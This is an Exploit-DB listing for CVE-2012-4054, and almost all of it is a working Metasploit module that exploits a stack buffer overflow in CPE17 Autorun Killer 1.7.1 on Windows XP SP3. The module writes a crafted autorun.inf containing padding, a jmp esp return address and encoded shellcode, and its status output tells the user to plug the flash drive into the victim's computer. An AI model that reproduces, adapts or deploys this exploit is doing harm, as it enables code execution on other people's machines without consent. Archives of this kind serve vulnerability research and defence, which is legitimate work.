CPE17 Autorun Killer <= 1.7.1 - Stack Buffer Overflow Exploit

2012-04-27T00:00:00
ID EDB-ID:18792
Type exploitdb
Reporter Xenithz xpt
Modified 2012-04-27T00:00:00

Description

CPE17 Autorun Killer <= 1.7.1 - Stack Buffer Overflow Exploit. CVE-2012-4054. Local exploit for windows platform

                                        
                                            #
# CPE17 Autorun Killer &lt;= 1.7.1 Stack Buffer Overflow exploit
# by Xelenonz

require 'msf/core'

class Metasploit3 &lt; Msf::Exploit::Remote

      include Msf::Exploit::FILEFORMAT

      def initialize(info = {})
                super(update_info(info,
                        'Name'           =&gt; 'CPE17 Autorun Killer &lt;= 1.7.1 Stack Buffer Overflow exploit',
                        'Description'    =&gt; %q{
                                        readfile function is vulnerable it can be overflow  
                                             },
                        'Author'         =&gt; [ 'Xelenonz' ],
                        'Version'        =&gt; '0.1',
                        
                        'Payload'        =&gt;
                                {
                                        'EncoderType' =&gt; Msf::Encoder::Type::AlphanumMixed,
										'EncoderOptions' =&gt; {'BufferRegister'=&gt;'ECX'},
                                },
			'DefaultOptions' =&gt;
                				{
                    			'DisablePayloadHandler' =&gt; 'true',
                				},
                        'Platform'       =&gt; 'windows',

                        'Targets'        =&gt;
                                [
                                        [
                                        	'Windows XP SP3',
                                          		{ 	'Ret' =&gt; 0x775a676f, 
                                          			'Offset' =&gt; 500 
                                          		} 
                                       ],
                                      
                                ],
                        'DefaultTarget' =&gt; 0,

                        'Privileged'     =&gt; false
                        ))

                        register_options(
                        [
                        	OptString.new('FILENAME',   [ true, 'The file name.',  'autorun.inf']),
                        ], self.class)
       end

       def exploit
       	  print_status("Encoding Payload ...")
          enc = framework.encoders.create("x86/alpha_mixed")
		  enc.datastore.import_options_from_hash( {'BufferRegister'=&gt;'ESP'} )
		  hunter = enc.encode(payload.encoded, nil, nil, platform)
		  buffer = ""
          buffer &lt;&lt; "A"*target['Offset'] # padding offset
          buffer &lt;&lt; [target.ret].pack('V') # jmp esp
          buffer &lt;&lt; hunter # shellcode
          print_status("Creating '#{datastore['FILENAME']}' file ...")
          file_create(buffer)
          print_status("Plug flashdrive to victim's computer")
          handler
          
       end
end